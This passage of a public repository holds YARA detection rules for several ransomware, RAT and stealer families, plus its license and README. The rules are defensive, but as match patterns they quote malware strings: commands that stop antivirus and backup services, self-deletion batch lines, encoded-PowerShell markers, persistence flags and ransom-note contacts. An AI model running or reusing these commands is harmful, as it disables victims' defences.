executing the MegaCortex payload (NOTE: May not be exclusive to MegaCortex) 14 | rule megacortex_av_bat { 15 | meta: 16 | author = "jeFF0Falltrades" 17 | 18 | strings: 19 | $str_1 = "taskkill /IM agntsvc.exe /Ftaskkill /IM dbeng50.exe /F" 20 | $str_2 = "net stop SQLAgent$SOPHOS /ynet stop AVP /y" 21 | $str_3 = "net stop \"Sophos Clean Service\" /y" 22 | $str_4 = "net stop \"Sophos Device Control Service\" /y" 23 | $str_5 = "net stop \"Sophos File Scanner Service\" /y" 24 | $str_6 = "net stop \"Sophos Health Service\" /y" 25 | $str_7 = "net stop \"Sophos MCS Agent\" /y" 26 | $str_8 = "net stop \"Sophos MCS Client\" /y" 27 | $str_9 = "net stop \"Sophos Message Router\" /y" 28 | $str_10 = "net stop \"Sophos Safestore Service\" /y" 29 | $str_11 = "net stop \"Sophos System Protection Service\" /y" 30 | $str_12 = "net stop \"Sophos Web Control Service\" /y" 31 | $str_13 = "sc config VeeamHvIntegrationSvc start= disabled" 32 | $str_14 = "sc config MSSQL$VEEAMSQL2012 start" 33 | $str_15 = "sc config SQLAgent$CXDB start= disabled" 34 | $str_16 = "taskkill /IM zoolz.exe /F" 35 | $str_17 = "taskkill /IM agntsvc.exe /Ftaskkill /IM dbeng50.exe /F" 36 | $str_18 = "taskkill /IM wordpad.exe /F" 37 | $str_19 = "taskkill /IM xfssvccon.exe /F" 38 | $str_20 = "taskkill /IM tmlisten.exe /F" 39 | $str_21 = "taskkill /IM PccNTMon.exe /F" 40 | $str_22 = "taskkill /IM CNTAoSMgr.exe /F" 41 | $str_23 = "taskkill /IM Ntrtscan.exe /F" 42 | $str_24 = "taskkill /IM mbamtray.exe /F" 43 | $str_25 = "iisreset /stop" 44 | 45 | condition: 46 | 5 of them 47 | } 48 | 49 | // Fires on the ransom note left behind MegaCortex ("!!!_READ_ME_!!!.txt") 50 | rule megacortex_ransom { 51 | meta: 52 | author = "jeFF0Falltrades" 53 | 54 | strings: 55 | $megacortex = "corrupted with MegaCortex" nocase 56 | $tsv = ".tsv" 57 | $morpheus = "We can only show you the door" 58 | $files = "email to us 2 files from random computers" 59 | $email_1 = "shawhart1542925@mail.com" 60 | $email_2 = "anderssperry6654818@mail.com" 61 | $email_3 = "ezequielgramlich6204294@mail.com" 62 | $email_4 = "cammostyn9012404@mail.com" 63 | 64 | condition: 65 | 2 of them 66 | } 67 | 68 | // (WIP) Fires on meterpreter payloads found beaconing to a C2 discovered in the MegaCortex attacks (89[.]105[.]198[.]28) 69 | rule megacortex_meterpreter { 70 | meta: 71 | author = "jeFF0Falltrades" 72 | 73 | strings: 74 | $cert = "Bud. 120-A, Vul. Balkivska1" 75 | 76 | condition: 77 | uint16(0) == 0x5a4d and $cert and (for any i in (0..pe.number_of_signatures) : (pe.signatures[i].serial == "00:CA:0E:70:90:D4:82:70:04:C9:9A:F2:FC:7D:73:3C:02" or pe.signatures[i].serial == "1D:A2:48:30:6F:9B:26:18:D0:82:E0:96:7D:33:D3:6A" or pe.signatures[i].serial == "01:FD:6D:30:FC:A3:CA:51:A8:1B:BC:64:0E:35:03:2D" or pe.signatures[i].serial == "03:01:9A:02:3A:FF:58:B1:6B:D6:D5:EA:E6:17:F0:66" or pe.signatures[i].serial == "06:FD:F9:03:96:03:AD:EA:00:0A:EB:3F:27:BB:BA:1B" or pe.signatures[i].serial == "0C:E7:E0:E5:17:D8:46:FE:8F:E5:60:FC:1B:F0:30:39")) 78 | } 79 | 80 | // (WIP) Fires on Rietspoof samples found loading MegaCortex based on certificates ( 81 | rule megacortex_rietspoof { 82 | meta: 83 | author = "jeFF0Falltrades" 84 | 85 | strings: 86 | $cert = "8 Quarles Park Road1" 87 | 88 | condition: 89 | uint16(0) == 0x5a4d and ($cert or (for any i in (0..pe.number_of_signatures) : (pe.signatures[i].serial == "53:CC:4C:69:E5:6A:7D:BC:36:67:D5:FF:D5:24:AA:4B" or pe.signatures[i].serial == "1D:A2:48:30:6F:9B:26:18:D0:82:E0:96:7D:33:D3:6A" or pe.signatures[i].serial == "13:EA:28:70:5B:F4:EC:ED:0C:36:63:09:80:61:43:36" or pe.signatures[i].serial == "0E:CF:F4:38:C8:FE:BF:35:6E:04:D8:6A:98:1B:1A:50" or pe.signatures[i].serial == "7E:93:EB:FB:7C:C6:4E:59:EA:4B:9A:77:D4:06:FC:3B" or pe.signatures[i].serial == "00:AD:72:9A:65:F1:78:47:AC:B8:F8:49:6A:76:80:FF:1E" or pe.signatures[i].serial == "01:FD:6D:30:FC:A3:CA:51:A8:1B:BC:64:0E:35:03:2D"))) 90 | } -------------------------------------------------------------------------------- /Broadbased/metamorfo.yar: -------------------------------------------------------------------------------- 1 | rule metamorfo_msi { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | ref = "https://blog.trendmicro.com/trendlabs-security-intelligence/analysis-abuse-of-custom-actions-in-windows-installer-msi-to-run-malicious-javascript-vbscript-and-powershell-scripts/" 5 | description = "This is a simple, albeit effective rule to detect most Metamorfo initial MSI payloads" 6 | 7 | strings: 8 | $str_1 = "replace(\"pussy\", idpp)" wide ascii nocase 9 | $str_2 = "GAIPV+idpp+\"\\\\\"+idpp" wide ascii nocase 10 | $str_3 = "StrReverse(\"TEG\")" wide ascii nocase 11 | $str_4 = "taller 12.2.1" wide ascii nocase 12 | $str_5 = "$bExisteArquivoLog" wide ascii nocase 13 | $str_6 = "function unzip(zipfile, unzipdir)" wide ascii nocase 14 | $str_7 = "DonaLoad(ArquivoDown" wide ascii nocase 15 | $str_8 = "putt_start" wide ascii nocase 16 | $str_9 = "FilesInZip= zipzipp" wide ascii nocase 17 | $str_10 = "@ u s e r p r o f i l e @\"+ppasta" wide ascii nocase 18 | $str_11 = "getFolder(unzipdir).Path" wide ascii nocase 19 | 20 | condition: 21 | 2 of them 22 | } 23 | -------------------------------------------------------------------------------- /Broadbased/nanocore.yar: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule nanocore_rat { 4 | meta: 5 | author = "jeFF0Falltrades" 6 | 7 | strings: 8 | $str_nano_1 = "NanoCore.ClientPlugin" wide ascii 9 | $str_nano_2 = "NanoCore.ClientPluginHost" wide ascii 10 | $str_plg_1 = "Plugin [{0}] requires an update" wide ascii 11 | $str_plg_2 = "Plugin [{0}] is being uninstalled" wide ascii 12 | $str_conn_1 = "PrimaryConnectionHost" wide ascii 13 | $str_conn_2 = "BackupConnectionHost" wide ascii 14 | $str_id = "C8AA-4E06-9D54-CF406F661572" wide ascii 15 | // Loop used to load in config 16 | $load_config = { 02 06 9A 74 54 00 00 01 0B 02 06 17 58 9A 28 3A 00 00 0A } 17 | 18 | condition: 19 | 2 of ($str_*) or $load_config or (pe.timestamp == 1424566177) 20 | } 21 | 22 | rule nanocore_surveillance_plugin { 23 | meta: 24 | author = "jeFF0Falltrades" 25 | 26 | strings: 27 | $str_name = "SurveillanceExClientPlugin.dll" wide ascii 28 | $str_keylog = "KeyboardLogging" wide ascii 29 | $str_dns_log = "DNSLogging" wide ascii 30 | $str_html_1 = ".+?(.+?)(.+?).+?.+?.+?.+?.+?(.+?)" wide ascii 31 | $str_html_2 = "(.+?)(.+?)(.+?)(.+?)" wide ascii 32 | $str_html_3 = "/shtml \"{0}\"" wide ascii 33 | $str_rsrc_lzma = "Lzma" wide ascii 34 | $str_nano = "NanoCore.ClientPlugin" wide ascii 35 | $str_pass_tool = "ExecutePasswordTool" wide ascii 36 | $get_raw_input = { 20 03 00 00 10 12 02 12 04 02 7B 09 00 00 04 28 C8 00 00 06 } // GetRawInputData Loop 37 | $get_dns_cache = { 12 02 7B 62 00 00 04 7E 7F 00 00 0A 28 80 00 00 0A 2C B5 } // GetDNSCacheDataTable Loop 38 | 39 | condition: 40 | (all of ($get_*)) or (3 of ($str_*)) or (pe.timestamp == 1424566189) 41 | } 42 | -------------------------------------------------------------------------------- /Broadbased/netwire.yar: -------------------------------------------------------------------------------- 1 | rule netwire { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | hash = "80214c506a6c1fd8b8cd2cd80f8abddf6b771a4b5808a06636b6264338945a7d" 5 | 6 | strings: 7 | $ping = "ping 192.0.2.2 -n 1 -w %d >nul 2>&1" wide ascii nocase 8 | $bat_1 = "DEL /s \"%s\" >nul 2>&1" wide ascii nocase 9 | $bat_2 = "call :deleteSelf&exit /b" wide ascii nocase 10 | $bat_3 = "start /b \"\" cmd /c del \"%%~f0\"&exit /b" wide ascii nocase 11 | $ua = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" wide ascii nocase 12 | $log = "[Log Started]" wide ascii nocase 13 | $xor = { 0F B6 00 83 F0 ?? 83 C0 ?? 88 02 } // movzx eax, byte ptr [eax]; xor eax, ??; add eax, ??; mov [edx], al (XOR encryption of log data) 14 | 15 | condition: 16 | 4 of them 17 | } 18 | -------------------------------------------------------------------------------- /Broadbased/parallax_rat.yar: -------------------------------------------------------------------------------- 1 | rule parallax_rat_2020 { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | 5 | strings: 6 | $str_ws = ".DeleteFile(Wscript.ScriptFullName)" wide ascii 7 | $str_cb_1 = "Clipboard Start" wide ascii 8 | $str_cb_2 = "Clipboard End" wide ascii 9 | $str_un = "UN.vbs" wide ascii 10 | $hex_keylogger = { 64 24 ?? C0 CA FA } 11 | 12 | condition: 13 | 3 of them 14 | } 15 | -------------------------------------------------------------------------------- /Broadbased/quasarrat.yar: -------------------------------------------------------------------------------- 1 | rule quasarrat { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | 5 | strings: 6 | $str_quasar = "Quasar." wide ascii 7 | $str_quasar_app = "QuasarApplication" wide ascii 8 | $str_quasar_client = "Quasar.Client" wide ascii 9 | $str_enable_logger = "ENABLELOGGER" wide ascii 10 | $str_hidden = "set_Hidden" wide ascii 11 | $str_shell = "DoShellExecuteResponse" wide ascii 12 | $str_close = "echo DONT CLOSE THIS WINDOW!" wide ascii 13 | $str_pause = "ping -n 10 localhost > nul" wide ascii 14 | $str_reconnect_delay = "RECONNECTDELAY" wide ascii 15 | $str_aes_exc = "masterKey can not be null or empty" wide ascii 16 | $byte_aes_key_base = { 7E [3] 04 73 [3] 06 25 } 17 | $byte_aes_salt_base = { BF EB 1E 56 FB CD 97 3B B2 19 } 18 | $byte_special_folder = { 7e 73 [4] 28 [4] 80 } 19 | $patt_config = { 72 [3] 70 80 [3] 04 } 20 | $patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 } 21 | 22 | condition: 23 | 5 of them and #patt_config >= 10 24 | } 25 | -------------------------------------------------------------------------------- /Broadbased/redline.yar: -------------------------------------------------------------------------------- 1 | rule redline_dropper { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | hash = "6d477b08a0b9c1e8db4ecb921d07b124973f5213639d88fff7df5146adcefc79" 5 | description = "This rule matches droppers that appear to be related to samples of RedLine Stealer or a derivation (as of APR2021)" 6 | 7 | strings: 8 | $str_0 = "RayCastingCSHARP.Properties.Resources.resources" wide ascii 9 | $str_1 = "VOICEPHILIN" wide ascii 10 | $str_2 = "TRUECITY" wide ascii 11 | $str_3 = "Ronald RayGun" wide ascii 12 | $str_4 = "MR POLICE" wide ascii 13 | $hex_0 = { 06 12 09 28 ?? 00 00 0A 6F ?? 00 00 0A 06 12 09 28 ?? 00 00 0A 6F ?? 00 00 0A 06 12 09 28 ?? 00 00 0A 6F ?? 00 00 0A } 14 | 15 | condition: 16 | 2 of them 17 | } 18 | 19 | rule redline_stealer { 20 | meta: 21 | author = "jeFF0Falltrades" 22 | hash = "f64ed3bd7304cdec6e99bb35662aa485e32156c1ca7275fed0c1e67d2f9fc139" 23 | description = "This rule matches unpacked RedLine Stealer samples and derivatives (as of APR2021)" 24 | 25 | strings: 26 | $str_0 = "Software\\Valve\\SteamLogin Data" wide ascii 27 | $str_1 = "name_on_cardencrypted_value" wide ascii 28 | $str_2 = "card_number_encrypted" wide ascii 29 | $str_3 = "geoplugin_region!" wide ascii 30 | $str_4 = "set_GameChatFiles" wide ascii 31 | $str_5 = "set_ScanDiscord" wide ascii 32 | $str_6 = "k__BackingField" wide ascii 33 | 34 | condition: 35 | 3 of them 36 | } 37 | -------------------------------------------------------------------------------- /Broadbased/remcos.yar: -------------------------------------------------------------------------------- 1 | import "pe" 2 | 3 | rule remcos_rat { 4 | meta: 5 | author = "jeFF0Falltrades" 6 | 7 | strings: 8 | $str_upload = "Uploading file to C&C" wide ascii 9 | $str_keylog_1 = "Offline Keylogger Started" wide ascii 10 | $str_keylog_2 = "Online Keylogger Started" wide ascii 11 | $str_mutex_1 = "Mutex_RemWatchdog" wide ascii 12 | $str_mutex_2 = "Remcos_Mutex_Inj" wide ascii 13 | $str_cleared = "Cleared all cookies & stored logins!" wide ascii 14 | $str_bs_vendor = "Breaking-Security.Net" wide ascii 15 | $str_controller = "Connecting to Controller..." wide ascii 16 | $str_rc4 = { 40 8b cb 99 f7 f9 8b 84 95 f8 fb ff ff 8b f3 03 45 fc 89 55 f8 8d 8c 95 f8 fb ff ff 99 f7 fe 8a 01 8b f2 8b 94 b5 f8 fb ff ff } // RC4 PRGA 17 | 18 | condition: 19 | 3 of ($str*) or (pe.sections[0].name == "VVR" and pe.sections[1].name == "ZKZR" and pe.sections[2].name == ".test" and pe.sections[3].name == "rca" and pe.sections[4].name == "vga") 20 | } 21 | -------------------------------------------------------------------------------- /Broadbased/ursnif_gozi_isfb.yar: -------------------------------------------------------------------------------- 1 | rule ursnif_zip_2019 { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | reference = "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html" 5 | 6 | strings: 7 | $doc_name = { 69 6e 66 6f 5f ?? ?? 2e ?? ?? 2e 64 6f 63 } // info_MM.DD.doc 8 | $zip_header = { 50 4B 03 04 } 9 | $zip_footer = { 50 4B 05 06 00 } 10 | 11 | condition: 12 | ($zip_header at 0) and ($doc_name in (0..48)) and ($zip_footer in (filesize-150..filesize)) 13 | } 14 | 15 | rule ursnif_dropper_doc_2019 { 16 | meta: 17 | author = "jeFF0Falltrades" 18 | reference = "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html" 19 | 20 | strings: 21 | $sleep = "WScript.Sleep(56000)" wide ascii nocase 22 | $js = ".js" wide ascii 23 | $ret = { 72 65 74 75 72 6e 20 22 52 75 22 20 2b 20 22 5c 78 36 65 22 } // return "Ru" + "\x6e" 24 | $pse = { 70 6f 77 65 72 73 68 65 6c 6c 20 2d 45 6e 63 20 } //powershell -Enc 25 | 26 | condition: 27 | uint16(0) == 0xcfd0 and all of them 28 | } -------------------------------------------------------------------------------- /Broadbased/venomrat.yar: -------------------------------------------------------------------------------- 1 | rule venomrat { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | 5 | strings: 6 | $str_id_venomrat = "venomrat" wide ascii nocase 7 | $str_hvnc = "HVNC_REPLY_MESSAGE" wide ascii 8 | $str_offline_keylogger = "OfflineKeylog sending...." wide ascii 9 | $str_videocontroller = "select * from Win32_VideoController" wide ascii 10 | $byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 } 11 | $patt_config = { 72 [3] 70 80 [3] 04 } 12 | $patt_keylog = {73 [3] 06 80 [3] 04} 13 | $patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 } 14 | 15 | condition: 16 | 5 of them and #patt_config >= 10 17 | } 18 | -------------------------------------------------------------------------------- /Broadbased/wsh_rat.yar: -------------------------------------------------------------------------------- 1 | rule wsh_rat_vbs_decoded 2 | { 3 | meta: 4 | author = "jeFF0Falltrades" 5 | ref = "https://cofense.com/houdini-worm-transformed-new-phishing-attack" 6 | description = "Alerts on the decoded WSH RAT VBScript" 7 | 8 | strings: 9 | $str_0 = "wshsdk" wide ascii nocase 10 | $str_1 = "wshlogs" wide ascii nocase 11 | $str_2 = "WSHRAT" wide ascii nocase 12 | $str_3 = "WSH Sdk for password recovery" wide ascii nocase 13 | $str_4 = "wshlogs\\recovered_password_email.log" wide ascii nocase 14 | $str_5 = "post (\"is-ready\",\"\")" wide ascii nocase 15 | $str_6 = "split (response,spliter)" wide ascii nocase 16 | $str_7 = "updatestatus(\"SDK+Already+Installed\")" wide ascii nocase 17 | $str_8 = "case \"get-pass-offline\"" wide ascii nocase 18 | $str_9 = "case \"up-n-exec\"" wide ascii nocase 19 | $str_10 = "Unable to automatically recover password" wide ascii nocase 20 | $str_11 = "reverseproxy" wide ascii nocase 21 | $str_12 = "keyloggerstarter" wide ascii nocase 22 | 23 | condition: 24 | 3 of ($str*) 25 | } 26 | 27 | rule wsh_rat_keylogger 28 | { 29 | meta: 30 | author = "jeFF0Falltrades" 31 | ref = "https://cofense.com/houdini-worm-transformed-new-phishing-attack" 32 | description = "Alerts on the WSH RAT .NET keylogger module" 33 | 34 | 35 | strings: 36 | $str_0 = "Keylogger" wide ascii nocase 37 | $str_1 = "RunKeyloggerOffline" wide ascii nocase 38 | $str_2 = "saveKeyLog" wide ascii nocase 39 | $str_3 = "sendKeyLog" wide ascii nocase 40 | $str_4 = "/open-keylogger" wide ascii nocase 41 | $str_5 = "wshlogs" wide ascii nocase 42 | $str_6 = "WSHRat Plugin" wide ascii nocase 43 | $str_7 = "Debug\\Keylogger.pdb" wide ascii nocase 44 | 45 | condition: 46 | 3 of them 47 | } 48 | 49 | rule wsh_rat_rdp 50 | { 51 | meta: 52 | author = "jeFF0Falltrades" 53 | ref = "https://cofense.com/houdini-worm-transformed-new-phishing-attack" 54 | description = "Alerts on the WSH RAT .NET RDP module" 55 | 56 | strings: 57 | $str_0 = "GET /open-rdp|" wide ascii nocase 58 | $str_1 = "WSHRat Plugin" wide ascii nocase 59 | $str_2 = "Debug\\RDP.pdb" wide ascii nocase 60 | $str_3 = "TakeShoot" wide ascii nocase 61 | $str_4 = "CompressJPEG" wide ascii nocase 62 | 63 | condition: 64 | 3 of them 65 | } 66 | 67 | 68 | rule wsh_rat_reverse_proxy 69 | { 70 | meta: 71 | author = "jeFF0Falltrades" 72 | ref = "https://cofense.com/houdini-worm-transformed-new-phishing-attack" 73 | description = "Alerts on the WSH RAT .NET reverse proxy module" 74 | 75 | strings: 76 | $str_0 = "RProxy:" wide ascii nocase 77 | $str_1 = "WSH Inc" wide ascii nocase 78 | $str_2 = "WSH Reverse Proxy" wide ascii nocase 79 | $str_3 = "Debug\\ReverseProxy.pdb" wide ascii nocase 80 | $str_4 = "WshRP" wide ascii nocase 81 | $str_5 = "NotifyBringNewSocket" wide ascii nocase 82 | 83 | condition: 84 | 3 of them 85 | } 86 | -------------------------------------------------------------------------------- /Broadbased/xenorat.yar: -------------------------------------------------------------------------------- 1 | rule xenorat { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | 5 | strings: 6 | $str_xeno_rat_1 = "xeno rat" wide ascii nocase 7 | $str_xeno_rat_2 = "xeno_rat" wide ascii nocase 8 | $str_xeno_update_mgr = "XenoUpdateManager" wide ascii 9 | $str_nothingset = "nothingset" wide ascii 10 | $byte_enc_dec_pre = { 1f 10 8d [4] (0a | 0b) } 11 | $patt_config = { 72 [3] 70 80 [3] 04 } 12 | 13 | condition: 14 | 4 of them and #patt_config >= 5 15 | } 16 | -------------------------------------------------------------------------------- /Broadbased/xworm.yar: -------------------------------------------------------------------------------- 1 | rule xworm { 2 | meta: 3 | author = "jeFF0Falltrades" 4 | 5 | strings: 6 | $str_xworm = "xworm" wide ascii nocase 7 | $str_xwormmm = "Xwormmm" wide ascii 8 | $str_xclient = "XClient" wide ascii 9 | $str_xlogger = "XLogger" wide ascii 10 | $str_xchat = "Xchat" wide ascii 11 | $str_default_log = "\\Log.tmp" wide ascii 12 | $str_create_proc = "/create /f /RL HIGHEST /sc minute /mo 1 /t" wide ascii 13 | $str_ddos_start = "StartDDos" wide ascii 14 | $str_ddos_stop = "StopDDos" wide ascii 15 | $str_timeout = "timeout 3 > NUL" wide ascii 16 | $byte_md5_hash = { 7e [3] 04 28 [3] 06 6f } 17 | $patt_config = { 72 [3] 70 80 [3] 04 } 18 | 19 | condition: 20 | 5 of them and #patt_config >= 5 21 | } 22 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | # Detection Rule License (DRL) 1.1 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this rule set and associated documentation files (the "Rules"), to deal in the Rules without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Rules, and to permit persons to whom the Rules are furnished to do so, subject to the following conditions: 4 | 5 | If you share the Rules (including in modified form), you must retain the following if it is supplied within the Rules: 6 | 7 | 1. identification of the authors(s) ("author" field) of the Rule and any others designated to receive attribution, in any reasonable manner requested by the Rule author (including by pseudonym if designated). 8 | 9 | 2. a URI or hyperlink to the Rule set or explicit Rule to the extent reasonably practicable 10 | 11 | 3. indicate the Rules are licensed under this Detection Rule License, and include the text of, or the URI or hyperlink to, this Detection Rule License to the extent reasonably practicable 12 | 13 | If you use the Rules (including in modified form) on data, messages based on matches with the Rules must retain the following if it is supplied within the Rules: 14 | 15 | 1. identification of the authors(s) ("author" field) of the Rule and any others designated to receive attribution, in any reasonable manner requested by the Rule author (including by pseudonym if designated). 16 | 17 | THE RULES ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE RULES OR THE USE OR OTHER DEALINGS IN THE RULES. 18 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # YARA-Signatures 2 | A collection of my public YARA signatures for various malware families. 3 | 4 | I am always looking for feedback, corrections, additions, tips, and lessons learned. 5 | 6 | The easiest way to get the above to me is [via Twitter](https://twitter.com/jeFF0Falltrades). 7 | --------------------------------------------------------------------------------